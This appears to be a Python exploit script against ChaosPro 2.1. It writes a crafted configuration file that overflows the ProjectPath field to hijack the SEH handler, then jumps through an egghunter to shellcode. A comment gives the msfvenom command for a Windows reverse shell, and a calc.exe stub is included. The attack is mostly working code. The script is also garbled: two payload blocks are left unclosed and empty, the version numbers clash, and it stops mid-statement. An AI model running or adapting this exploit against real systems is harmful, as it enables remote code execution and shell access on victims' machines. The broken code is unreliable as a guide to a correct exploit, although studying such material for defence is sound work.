# Title : ChaosPro 2.1
# Twitter : @securitychops
# Blog Post : https://securitychops.com/2019/08/24/retro-exploit-series-episode-one-chaospro-3-1.html
# Our egg: a 4-byte tag written twice (8 bytes total). The egghunter defined
# further down searches memory for this marker; the real shellcode is
# appended straight after it (payload += ...), so it rides along in the same
# config line.
payload = "T00W" * 2
#the payload
payload += (
# msfvenom -p windows/shell_reverse_tcp LHOST=<listener IP>
# LPORT=4444 -e x86/alpha_upper -a x86 --platform windows -f c -b '\x00'
# Two 4-byte, null-free jump stubs. Each one decodes as
#   40      inc eax
#   75 xx   jnz short xx
#   75      filler (keeps the stub exactly 4 bytes wide)
# and therefore acts as an unconditional short jump as long as eax + 1 != 0.
# Original author's note: this first one has to jump *backwards* to leave
# room for the stack-jump code.
jmpbackD0 = "".join(map(chr, [0x40, 0x75, 0xD0, 0x75]))     # jnz -0x30 (48 bytes back)
jmpforward06 = "".join(map(chr, [0x40, 0x75, 0x06, 0x75]))  # jnz +0x06
# 16-byte "run calc.exe" stub from https://www.exploit-db.com/exploits/43773/
# NOTE(review): it calls through a hard-coded absolute address (0x77C293C7),
# so it only works on the exact Windows build it was lifted from; re-resolve
# that address (or use a position-independent payload) before reusing it.
# NOTE(review): these are str literals holding raw bytes, i.e. Python 2
# semantics; under Python 3 they become text and get re-encoded on write,
# corrupting every byte >= 0x80.
opencalc = "".join(map(chr, [
    0x31, 0xC9,                    # xor ecx, ecx
    0x51,                          # push ecx          ; NUL terminator
    0x68, 0x63, 0x61, 0x6C, 0x63,  # push "calc"
    0x54,                          # push esp          ; pointer to "calc\0"
    0xB8, 0xC7, 0x93, 0xC2, 0x77,  # mov eax, 0x77C293C7
    0xFF, 0xD0,                    # call eax
]))
# our egghunter shellcode
egghunter = (
# Config line 1 carries the egg + shellcode; line 2 is the field whose value
# overflows ("ProjectPath "). Everything after "ProjectPath " is the overflow
# buffer, so all offsets below are relative to the start of that value.
line_start = "".join(["Username ", payload, "\n", "ProjectPath "])

# Overflow buffer layout (offsets relative to the start of the ProjectPath value):
#   'A' filler ........................ up to offset 2569 - 118 - 8
#   'A' padding + egghunter ........... a 118-byte slot, hunter ends at 2561
#   jmpforward06 ...................... 4 bytes at 2561
#   jmpbackD0 ......................... 4 bytes at 2565
#   handler address ................... 3 bytes at 2569
# 2569 and 118 are the crash/offset values from the original research;
# confirm them in a debugger before reusing this against another build.
junk = "".join([
    line_start,
    # 'A' (0x41) filler; keeps the 8 bytes of jump stubs inside the 2569 budget
    "A" * (2569 - 118 - len(jmpforward06) - len(jmpbackD0)),
    # pad the 118-byte slot so the egghunter ends exactly where the stubs begin
    "A" * (118 - len(egghunter)),
    egghunter,
    # Both stubs decode as `inc eax ; jnz rel8 ; 0x75 filler`, a null-free
    # short jump that is unconditional whenever eax + 1 != 0. Which of the two
    # the pop/pop/ret lands on (the nSEH slot) and where it ends up is not
    # evident from the layout alone -- verify the control flow in a debugger.
    jmpforward06,   # jnz +0x06
    jmpbackD0,      # jnz -0x30
    # SEH handler: 0x004011ab little-endian, i.e. a pop/pop/ret inside the
    # target's own image. Only 3 bytes are written; the trailing 0x00 has to
    # come from whatever terminates the line/string when the file is parsed
    # (per the original author), so nothing can follow it on this line.
    "\xab\x11\x40",
])
# write the evil file
with open('C:\\Program Files\\ChaosPro2.1\\ChaosPro.cfg', 'w') as the_file: